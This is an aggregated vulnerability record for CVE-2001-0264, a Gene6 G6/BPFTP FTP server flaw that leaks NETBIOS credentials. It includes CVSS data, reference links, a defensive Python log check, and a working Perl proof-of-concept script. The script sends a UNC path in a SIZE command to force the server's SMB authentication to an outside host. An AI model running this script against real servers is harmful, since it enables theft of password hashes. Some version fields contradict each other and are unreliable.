CVE-2001-0264
CVSS 5.0
Published: 2001-06-18 00:00:00
Last modified: 2008-09-05 16:23:41

[Original] Gene6 G6 FTP Server 2.0 (aka BPFTP Server 2.10) allows remote attackers to obtain NETBIOS credentials by requesting information on a file that is in a network share, which causes the server to send the credentials to the host that owns the share, and allows the attacker to sniff the connection.


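[CNNVD] Gene6 BPFTP FTP Server User Credentials Disclosure Vulnerability (CNNVD-200106-103)

        A vulnerability exists in Gene6 G6 FTP Server 2.0 (also known as BPFTP Server 2.10). Remote attackers can obtain NETBIOS credentials by requesting information on a file in a network share.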

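- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0264
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0264
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-103
(Official data source) CNNVD

- Other Links and Resources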

http://www.securityfocus.com/bid/2534
(VENDOR_ADVISORY)  BID  2534
http://www.atstake.com/research/advisories/2001/a040301-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A040301-1

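- Vulnerability Information

Gene6 BPFTP FTP Server User Credentials Disclosure Vulnerability
Medium severity  Environment error
2001-06-18 00:00:00 2005-10-20 00:00:00
Remote
        A vulnerability exists in Gene6 G6 FTP Server 2.0 (also known as BPFTP Server 2.10). Remote attackers can obtain NETBIOS credentials by requesting information on a file in a network share.

- Advisories and Patches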

        Gene6 has addressed this issue in BPFTP Server v2.10:
        Gene6 G6 FTP Server 2.0
        

- Vulnerability Information (20723)

Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability (EDBID:20723)
windows remote
2001-04-03 Verified
0 Rob Beck
N/A
source: http://www.securityfocus.com/bid/2534/info

G6 FTP Server, now known as BPFTP Server, is an Internet FTP server by Gene6.

If a logged-in FTP user connects to an external share and submits a malformed 'size' or 'mdtm' command, the user could force the FTP server to make an external SMB connection.

The FTP server must provide login credentials of the user the server is running under in order to make a connection to the remote host. A password hash is sent across the external connection to the host. A third-party network utility could be listening for internal and external traffic and capture the password hash. The captured hash could be resolved into the username and password.

#!/usr/bin/perl
# G6-2nbt.pl - example G6 ftp server netbios connection script
#
# Tested on win32 and Linux, Linux requires share name to be in
# the format: \\\\host\\share\\path or //host/share/path

use Getopt::Std;
use IO::Socket;

my($host,$login,$pass,$share,$CRLF,$result);

$CRLF = "\015\012";
getopts('h:l:p:s:',\%args);

if (!defined $args{h}){ print "No host specified.\n";exit;}else{$host = $args{h};}
if (!defined $args{s}){ print "No share specified.\n";exit;}else{$share = $args{s};}
if (!defined $args{l} || !defined $args{p}){($login,$pass) = ('anonymous','user@myhost.com');}
else { ($login,$pass) = ($args{l},$args{p});}

$our_sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>21) || die("Socket problems.");

print "Connected!\n";
print "Login...";

print $our_sock "USER $login" . $CRLF;
$result = <$our_sock>;
if ($result !~ /331\s/) { print "User name not accepted or an error occurred...exiting.\n";close($our_sock);exit; }

print "good.\nPass....";

print $our_sock "PASS $pass" . $CRLF;
$result = <$our_sock>;
if ($result !~ /230\s/) { if ($result =~ /530\s/) { print "Login/password incorrect exiting.\n";close($our_sock);exit; } else { print "Login failure..exiting.\n";close($our_sock);exit; }}

print "good.\nTesting path type...";

print $our_sock "PWD" . $CRLF;
$result = <$our_sock>;
$result = <$our_sock>;
if (lc($result) !~ /\/[a-z][:]\//) { print "Looks like 'show relative path' is enabled...exiting.\n";close($our_sock);exit;}

print "not relative path.\nSending UNC to connect to...";

print $our_sock "SIZE $share" . $CRLF;
print "completed.\nCheck your logs.\n";

close($our_sock);
exit;
		

- Vulnerability Information

13856
Gene6 G6 FTP Server File Request NETBIOS Credential Exposure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability Description

- Timeline

2001-04-03 Unknown
2001-04-03 Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Gene6 BPFTP FTP Server User Credentials Disclosure Vulnerability
Environment Error 2534
Yes No
2001-04-03 12:00:00 2009-07-11 06:06:00
Discovered by Rob Beck [rbeck@atstake.com] on April 3, 2001.

- Affected Program Versions

Gene6 G6 FTP Server 2.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Gene6 BPFTP Server 2.10
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- Unaffected Program Versions

Gene6 BPFTP Server 2.10
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- Vulnerability Discussion

G6 FTP Server, now known as BPFTP Server, is an Internet FTP server by Gene6.

If a logged-in FTP user connects to an external share and submits a malformed 'size' or 'mdtm' command, the user could force the FTP server to make an external SMB connection.

The FTP server must provide login credentials of the user the server is running under in order to make a connection to the remote host. A password hash is sent across the external connection to the host. A third-party network utility could be listening for internal and external traffic and capture the password hash. The captured hash could be resolved into the username and password.
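
A log check for the behaviour described above, as an added example that is not part of the original advisory or of Gene6's software: it flags SIZE and MDTM commands whose argument is a UNC path and lists the SMB hosts the server was asked to contact. The log line layout, host names and addresses are constructed assumptions.

```python
import re

# FTP verbs the advisory names as triggering the outbound SMB connection.
FILE_INFO_VERBS = {"SIZE", "MDTM"}
# UNC argument in either form: \\host\share\path or //host/share/path.
UNC_RE = re.compile(r'^(?:\\\\|//)(?P<host>[^\\/\s]+)[\\/](?P<share>[^\\/\s]+)')
# Assumed log layout (hypothetical, not Gene6's real log format):
#   <date> <time> <client-ip> <ftp-user> <VERB> <argument>
LINE_RE = re.compile(r'^(\S+ \S+) (\S+) (\S+) ([A-Za-z]{3,4})(?: (.*))?$')

def find_unc_requests(lines):
    """Return one finding per SIZE/MDTM command whose argument is a UNC path."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        when, client, user, verb, arg = m.groups()
        if verb.upper() not in FILE_INFO_VERBS or not arg:
            continue
        unc = UNC_RE.match(arg.strip())
        if unc:
            findings.append({
                "time": when, "client": client, "user": user,
                "verb": verb.upper(),
                "smb_host": unc.group("host").lower(),
                "share": unc.group("share"),
            })
    return findings

def external_smb_hosts(findings, internal_hosts):
    """SMB hosts named in findings that are not on the known file-server list."""
    allowed = {h.lower() for h in internal_hosts}
    return sorted({f["smb_host"] for f in findings} - allowed)

# Constructed sample log lines for illustration.
SAMPLE_LOG = [
    r"2001-04-03 12:00:01 192.0.2.10 anonymous PWD",
    r"2001-04-03 12:00:02 192.0.2.10 anonymous SIZE \\203.0.113.7\share\file.txt",
    r"2001-04-03 12:00:09 192.0.2.11 alice SIZE /c:/pub/readme.txt",
    r"2001-04-03 12:01:30 192.0.2.12 bob mdtm //fileserver01/public/doc.txt",
    r"2001-04-03 12:02:00 192.0.2.12 bob RETR //fileserver01/public/doc.txt",
]

if __name__ == "__main__":
    hits = find_unc_requests(SAMPLE_LOG)
    print(hits, external_smb_hosts(hits, ["fileserver01"]))
```

Hosts returned by `external_smb_hosts` are candidates to correlate with outbound SMB connections from the FTP server in firewall or flow logs.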

- Exploit

The following exploit has been provided by Rob Beck [rbeck@atstake.com] from @stake:

- Solution

Gene6 has addressed this issue in BPFTP Server v2.10:


Gene6 G6 FTP Server 2.0

- Related References
